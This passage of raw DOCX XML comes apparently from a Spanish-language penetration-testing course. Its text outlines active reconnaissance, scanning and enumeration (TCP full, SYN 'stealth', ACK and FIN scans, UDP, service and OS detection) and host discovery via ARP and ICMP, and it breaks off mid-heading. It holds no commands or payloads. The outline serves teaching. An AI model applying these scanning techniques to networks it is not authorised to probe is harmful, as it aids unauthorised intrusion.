    </w:p>
    <w:p w14:paraId="7F1B6AF9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:before="425"/>
        <w:ind w:left="953" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15806976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="272A53E1" wp14:editId="1DE0A1BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>768960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5608821</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109175" cy="1029220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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186" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1109175" cy="1029220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15807488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DA91EE2" wp14:editId="6C12946C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>9499996</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1372838" cy="1096080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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87" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1372838" cy="1096080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Reconocimiento activo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3D7AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="307"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D6068E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="931"/>
          <w:tab w:val="left" w:pos="1057"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="931" w:right="968" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>También conocida como Recopilación Activa de Información, es una técnica para obtener información sobre el objetivo de manera extensa, haciendo una conexión real con el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C62EFA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="332"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B053244" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="931"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="931" w:right="1473" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Existe una alta probabilidad de detección, ya que estamos estableciendo una conexión activa con el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716647DF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE028CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="930"/>
        </w:tabs>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="930" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Pero el reconocimiento pasivo tiene su propia limitación, que es que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>obtendrá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A24CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="931"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cantidad específica de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2AEB5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="260" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E50E40" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1944"/>
        </w:tabs>
        <w:spacing w:line="660" w:lineRule="exact"/>
        <w:ind w:left="1944"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo y enumeración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E608571" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="127"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EC11DF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1695"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1695" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Descubrimiento de hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66767F56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1695"/>
        </w:tabs>
        <w:spacing w:before="566"/>
        <w:ind w:left="1695" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo de puertos TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFF296" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="78"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780A575B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2416"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo completo de TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6296E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2416"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP SYN (escaneo sigiloso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030460A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2416"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBC8BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2416"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP FIN/RST/PSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44511C6E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BC8804" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1695"/>
        </w:tabs>
        <w:ind w:left="1695" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Detección de versiones de servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAFC69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1695"/>
        </w:tabs>
        <w:spacing w:before="566"/>
        <w:ind w:left="1695" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Detección de SO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557224D4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1695"/>
        </w:tabs>
        <w:spacing w:before="566"/>
        <w:ind w:left="1695" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo de puertos UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FBCD4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="620" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FFFF94" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="706" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detección de hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCAD39" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278E6975" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="938"/>
        </w:tabs>
        <w:ind w:left="938" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es un proceso de descubrimiento del host en vivo en una red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7069D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="308"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C987F97" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="939"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1749"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El concepto de Host Discovery se basa completamente en el funcionamiento del protocolo como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163D00D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D313080" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="938"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="938" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Protocolo de resolución de direcciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131E9E08" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A15DC5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="938"/>
        </w:tabs>
        <w:ind w:left="938" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Uso de ping para descubrir los hosts en vivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0196FF46" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="800" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CBD675" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo5"/>
        <w:spacing w:line="698" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Descubrir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
